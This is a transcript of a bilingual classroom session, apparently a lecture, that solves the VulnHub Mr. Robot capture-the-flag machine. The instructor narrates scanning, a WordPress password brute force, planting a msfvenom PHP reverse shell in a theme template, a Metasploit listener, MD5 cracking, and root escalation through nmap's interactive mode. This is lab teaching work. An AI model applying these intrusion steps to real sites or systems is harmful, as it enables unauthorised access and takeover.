the enumeration module, and we will do a CTF, which is basically a capture the flag in today's session, and we will do a lot of enumeration to find out the flags. It is a challenge. There is a virtual machine which is Mr. Robot, and you can download this virtual machine from internet by visiting on vulnhab.com. So I am going to use this machine in today's topic, Mr. Robot. Basically, it is a machine on which we have to find out the keys. So this is the virtual machine, and you can download it and import it in your virtual box or VMware Workstation Pro. So the thing is, based on the show Mr. Robot, this VM has 3 hidden keys in different locations. Your goal is to find out all 3. Each key is progressively difficult to find, and the VM is not too difficult. There is not any advanced exploitation or reverse engineering. The level is considered beginner and intermediate. So we have to find out the 3 hidden keys that is hidden inside the Mr. Robot VM. So I have already downloaded, and let me show you. I have downloaded and installed it in my download folder with the name Mr. Robot, and I am going to start it. Let me open it. Download one love Mr. Robot. This. So today's session is going to be interesting, and you will learn a lot of things. You will learn how to pen test on a network based machine, and you will also learn how to identify the hidden things or how to use the tools properly to enumerate. So the machine has been started, and now what I have to do is, this is our victim machine on which we have to do a lot of enumeration, as well as we have to find out the keys. So the thing is, I am on my Kali Linux machine. The first thing is, I have to enumerate the network, and I have to find out the IP address of the machine. So there is a vulnerable machine in my network, and I have to find out the IP address of the machine. I even don't know the IP address of the vulnerable machine. So I'm using the net discover command to scanning my whole network so that I can gather the information of the machine. So you can see there are 2 machines available. One is 192.168.0.108. 108 is my Windows operating system, which is Windows 8. Let me show you. You can see this is my Windows 8, and the another is my victim machine. So what will I do? I will enumerate. I will nmap. After net discover, I will scan the machine with the Nmap. I want to scan all the ports of the machine. And do you know what is the meaning of -A? Anybody else? तो बताएगा -A यूज क्यों किया गया है? We used -A for the aggressive scan. It means it will scan for the trace route, operating system, service detection, a lot of things. It will give you a detailed scanning of all the things that is uh, necessary for a particular scan. So the first step was we have discovered the IP address of our victim, our target. So the IP address of my machine was 192.168.0.126. And the second step is I am going to get the information about the open ports. If the port 80 is open, I can open this IP in my browser. So I'm trying to get the information about the ports, operating systems, services that is running on this particular IP. It will help me a lot because I don't know where is the key is. So we have to find out the keys. We have to find out the hidden directories. We have to enumerate a lot of things to find out the necessary things. So you can see the result is here. The port 22 is closed. The port 80 is open. And the port 443 is open. So two ports are open. If the port 80 is open, I can open this machine in my browser. So I will type the IP address of the machine 192.168.0.126. So the machine has been started here and it is loading. And you can see a message is coming. So there are limited commands. There are 6 commands available here, which I can execute on the terminal. Prepare, F society, inform, question, and wake up. Join. So what will I do? I will try to gather the information. I will use the tool Nikto. Basically, Nikto is a tool which is a web scanner. So let me show you the manual of the Nikto. Nikto. So you can see Nikto scan web server for known vulnerabilities. So it is a web-based application. So I will try to find out the vulnerabilities. I will use Nikto space -h, h for host, and IP address of the machine, IP address of the target. So I'm using the tool Nikto to identifying the vulnerabilities that is available in this IP so that I can understand the infrastructure of the website. So you can see it has retrieved information which is PHP 5.5.29. So the version of PHP is 5.5.29. So it is taking a lot of time. So you can see the output is here, and it has detected that the website has a list of web pages available, which is WP login, which is interesting. So there is a WP login page available on Mr. Robot's web page, and license.txt. Let me run it again. Now, what will I do? I will look for the robot.txt file, which is basically a file in which something interesting could be find out. So we have to just put slash robot dot robots.txt, and you can see there is a message user agent fsociety.dic and key one of three. So maybe this is the key one. You can see the key one of three. So let me copy it and paste it by removing the robot.txt, and I will paste it here and click enter. You can see the the first key has been cleared. So I am going to save these keys on my notepad file. So key one, and the key one is this. Now we have to find out the key two, which is not a easy task because, as he said, every key is difficult to find after each key. So I am just using these. So we have to find out the key two and key three. So I'm putting it. We already found a login page, which is WP login. But before it, we saw that there is a file F Society. So let me copy it and put it in the browser as well. Copy, put, and F Society. So this is a file with fsociety.dic. Let me download and save it. I have already downloaded it now. So now what is the next is we found a login page, WP admin, which was WP admin, while scanning with the Nikto. Let me show you. We found a PHP page and the website is based on WordPress. So here is the login. So is there anybody who have seen the Mr. Robot web series? कोई है जिसने मिस्टर रोबोट वेब सीरीज देखी है?
नो सर, लाइक आधी देखी थी और बहुत पहले देखी थी।
ठीक है, तो उसमें मिस्टर रोबोट कौन था, बता सकते हो? उसमें जो हैकर था वो कौन था, उसका नाम?
नहीं, याद नहीं है सर।
सर एलियट था शायद।
हाँ, एलियट था। तो ये वेब सीरीज जो है बेसिकली एलियट के ही ऊपर मोटिवेटेड है। और यहाँ पर हम क्या करेंगे, हमें यूजर नेम और पासवर्ड मिल चुका है, तो व्हाट विल वी डू, वी विल ट्राई रैंडम यूजर नेम हियर एंड पासवर्ड एंड इट विल शो यू इनवैलिड यूजर नेम, बट while using the Elliot, because Elliot was the main character and I don't know the password, I just know the username and hit enter. You can see the message is different now. The password you entered for the username is incorrect. So now I am sure that the username is Elliot, but I don't know the password, and the password is in the list that we have downloaded. So we have downloaded a dictionary file and the password is in the list. So what we have to do, we have to brute force. We have to brute force on the website by using the word list that we have downloaded. So what is the way to brute force? First, I have to sorting the word list. So let me show you the how many words are there in the word list. CD downloads ls, and here is my word list. So first I have to know the file type, name of set. Okay, so I will type wc-l f society. Word count, I want to count the words, so there are 8,58,160 words are here in the fsociety.dic word list. So there are lots of words are available and some of words are repeated also. So these are some words which is available in the word list. So what will I do? I will sort the word list. Sort, I will use the command sort fsociety.dicc colon. I will use the symbol of pipe, then unique, because I want to get the information of unique characters, slash word count hyphen l. Now it will sort the word list and it will show you the word count. What will I do now? I will type unique and I will save it with the fsociety.txt. So now my word list is sorted, and I can see there are only limited number of passwords available. It has sorted my word list, and you can see there are 11,000 something kuch passwords available here. What will I do now? I will brute force on the WordPress. Here I know the username, but I don't know the password, and I will brute force on this IP by using the word list. So what will I do? I will just open my terminal and here I will type WP scan. So this is the syntax. There is a tool WP scan, which is WordPress scanner, and we can also use this WordPress scanner to brute force on a directory that is available on the WordPress. So here is my directory, and hyphen URL is for the URL on which you want to brute force. Then hyphen U, capital U, which is used to brute force on a username. So I know the username, that's why I'm using Elliot, and I don't know the password, that's why I'm using the word list. So my word list is in the fsociety.txt and hit enter. So it will try to brute force and it will try to find out the username and passwords. And you can see the username is Elliot and the password is ER280652. So I'm going to use this as a password and I will put the password here and log in. So I logged in, but the catch is now we have to find out the second key, but we don't know the procedure. So what we have to do, we have to upload a shell in the WordPress because I already in the WordPress. So I will upload a shell in the WordPress so that I can take the web server remotely. I can take the access of the web server remotely. So what will I do? I will go to the appearance and then editor. In the editor tab, I will go to the 404 template and here I will upload a code. Which kind of code? I have to create a shell. So I will create a shell by using the Metasploit framework, MSF console. So what will I do? I will type MSF console, MSF Venom, which is a standalone payload generator. MSF Venom, and you can see the, let me find out my IP address. My IP address is 110. So you have to type this code MSF Venom -P, P for payload, and the payload is, and which kind of payload is PHP. So we are creating a payload for PHP. Slash meterpreter is a payload type, reverse TCP because we want a connection back. That's why we are using reverse TCP. Alhost equal to your local IP address, which is your Kali Linux machine's IP address. And Alport is, you can use any kind of Alport. So 44444 and -F, F for format, space raw. So raw, because I am using a raw. Raw means it will generate a source code, not a payload. So it has generated a source code. So you have to select this source code and you have to copy it. Then you have to paste this code in the template and you have to update file. So you have already uploaded the file. The file edited successfully. Not what we have to do. We have to create a listener so that we can talk to the payload. So for creating a listener, we will type MSF console, sudo MSF console.
Excuse me, sir. After like getting into the profile, after logging in, how did you know that you had to do something with shell and write a payload and all? Like, how did you know you had to do that?
The only way is whenever you logged in a website or any kind of a template, and there is option where you can type or upload anything, then the simple way is you have to upload a shell. Okay. तो जब भी आप किसी वेबसाइट में लॉग इन करते हो या आपको कोई भी ऐसा टेम्पलेट मिलता है जिसमें आप इनपुट कोड डाल सकते हो या कुछ भी ऐसा जो अपलोड हो रहा हो, सबमिट हो रहा हो, क्वेरी सबमिट हो रही है, वहां पे आप एक कोई भी ऐसा मॉलिशियस कोड डाल दो, क्योंकि जितने भी CTFs होते हैं ना उसमें आपको क्या होता है, रिमोटली एक्सेस लेना होता है। उस रिमोटली एक्सेस लेने से आप उसकी डायरेक्टरी में आ जाते हो। अभी मैं इसकी जो वर्डप्रेस पे मेरी साइट है, मुझे इसकी डायरेक्टरी को एक्सेस करना है अपने टर्मिनल पर, तो उसके लिए मैं शैल अपलोड करूंगा, वो मेरा टास्क इजी कर देगा। यहाँ पर मैं मैनुअली चीजों को करूंगा, मुझे काफी टाइम लगेगा क्योंकि मुझे खुद नहीं पता कि इसके बैकएंड में कितनी डायरेक्टरीज है। सो आई विल यूज द शैल टू फाइंड आउट द डायरेक्टरीज दैट इज अवेलेबल ऑन द वर्डप्रेस। दैट्स व्हाई आई एम अपलोडिंग अ शैल।
Okay, sir.
Here I will type use exploit slash multi slash handler then I will type set payload and you have to type the payload type, and the payload was Android, not Android, PHP slash reverse interpreter slash reverse underscore TCP. Now I have to type shell alhost, and my alhost was localhost, my IP. Set lport, all the steps that was used while creating a payload. And what will I do? I will type exploit. So our payload is trying to create a connection with the multi-handler, and we are waiting for the connection reverse TCP handler, but we have to give the path. So we have to give the path of the directory where we have uploaded our shell. So I will give the path theme not theme. We have created our payload under the 2015 template. So what will I do? I will type the path of the directory. We have a 2015 under 2015 because we are under the themes, so we have to put the themes slash 2015 and then template name. So what is our template name is? Our template name is 404. So we will type 404 slash 404 dot php. So let's see, did we get the shell? Not, we did not get any shell. Let's try again. So we have to give the path wp admin slash,
सर पहले अपीयरेंस उसके बाद थीम ना।
एक मिनट, wp admin अपीयरेंस ले लेते हैं। उसके बाद थीम्स, देन हमारा 2015, देन 40 4
पेरेंट्स की स्पेलिंग RA
ठीक है। So you can see Meterpreter session opened and we have got the response. Now what I have to do is I have to type the shell because I want to get the shell. Type shell, but it is not a permanent shell. It is just a temporary and it will fluctuate. There is a possibility that our connection can be closed soon. So what I have to do is I will use the Python shell so that I can take the permanent access. So I will type TTYL shell, TTYL shell on Google to get the code, and I can use the spawning a TTY shell. So basically I have to import the Python module for the spawn shell. I will copy the code and I will paste it into the here. Hit enter and you can see we have got a shell which is now not a permanent, is a temporary, but it will not fluctuate. What I have to do is I will type ls to get the list of the files here, and you can see there are a lot of files here. We have to go to the home directory. I will type /cd/home and I am in the home. Type ls. You can see there is a folder which is robot. I will go to the folder robot and type ls, and you can see key 2 of 3. So there is a key 2 of 3. So let me try to read it. 2 of 3 dot txt and permission denied. I'm not a root user here, but I can read the password dot rw file. So let me read it. Cat command is used to read the file. Password dot raw hyphen md5, and you can see the password is this. The password for the robot is this, but it is encrypted, so we have to decrypt it. I will use the MD5 decryptor. If you don't know what kind of hashes is this, you can use the tool hash identifier in the Kali Linux and hit enter. Here you have to type the hash and you can see the hash is MD5. Now we have to decrypt it. For to decrypting, I am using the website CrackStation, which is a good site. Just paste your hash here and select I'm not a robot and click on crack hash. So you have got the results and the password is this. Now what will I do? I will copy the password here and I will try to log in with the sudo robot, and it is asking for the password. We have cloned the password and hit enter. You can see now I am root at the rate robot at the rate Linux. So I am in the robot file system. Now I can read the file key 2 of 3 dot txt, and this is my second key. This is my second key. So we have find out the second key. Now the third task is we have to find out the third key, but we don't know the procedure. But all the machines that is like in which you have to find out the keys are boot to root machines, in which you have to take the administrator rights. You have to take the root privileges. For root privileges, the step is privilege escalation. That is called privilege escalation. Now what I have to do is I have to find out a directory in which root permissions are allowed.
तो
Yes.
तो जैसे कि इसमें पता चल, जैसे कि इसमें जो की है ना,
हाँ
तो सर उसमें जैसे कि की 1 डॉट आउट ऑफ 3 करके .txt फाइल है सारी।
हाँ
तो जैसे कि पहले में 1.2 था, 1 आउट ऑफ 3, 2 आउट ऑफ 3, तो थर्ड वाला तो ऑब्वियसली 3 आउट ऑफ 3 होगा ना।
3/3 होगा।
तो सर हम डायरेक्ट नहीं कर सकते?
कर सकते हैं, लेकिन पहले हमें वो देखना पड़ेगा कि वो कहाँ पर है। अगर मैं लोकेट करूँ, ठीक है, लोकेट कमांड इज यूज फॉर फाइंडिंग आउट द पर्टिकुलर थिंग। तो मैं अगर 3/3 करता हूँ, and it will not execute because we have to, there is a portion in which we don't have the root administrator privileges, so we have to take the root permission, then we can find out the third key. So for getting the information for the third key, we have to execute a command. This command is find slash for the directory, and what kind of, I want to find out the permission hyphen u user equals to, which is user should be super user, and the type of the file is to, basically this is a command for the null content in Linux. So it will find out all those directories. So it is running. Let me stop it. I have to take the connection again. So the main task of this command is we have to find out a directory in which we can find out a tool which is using the root privileges. So there is a tool which is nmap. So nmap is in the bin directory and user local bin, and nmap is a tool which we can use for the root with the root privileges. So what will I do now? I will type nmap hyphen interactive. So basically what is interactive? So nmap is a functionality, nmap has a functionality, and nmap can use interactive in which user are able to execute shell commands by using a nmap shell. So it is taking nmap shell and I have typed nmap space interactive. Now what will I do? I have to type the shell commands. So I will type shell sh, then I will type id. You can see nmap has been started, and I will type shell command. So I am using the syntax sh dot sh is not found id, and you can see there is a root user with the id 0. What will we do? We go to the root directory. Robot has id 1002, but root has a directory cd/root and ls. You can see there are 3 key of 3. So every directory that has a value 0, if a directory has a value 0, so we can understand that the directory is root directory, or a directory has a root privileges. So now we can see the key 3, key cat key 3 out of 3. And you can see this is my hash. So this is the third key. So this was the task, and we did a lot of things to enumerate. We did Nikto, we did nmap, we did a lot of tools. So you can see this was the way to enumerate our application. The first thing was you had just a IP address. Even you don't know the IP address of the machine was. You just scanned with the help of the netdiscover command, you find out the IP address, then you try to find out the ports that is running on the particular machine, then you try to log in. So this is the proper way to enumerate a network or enumerate a machine which is available in your network. So is there any question? Guys, is there any doubt? किसी को कुछ पूछना है?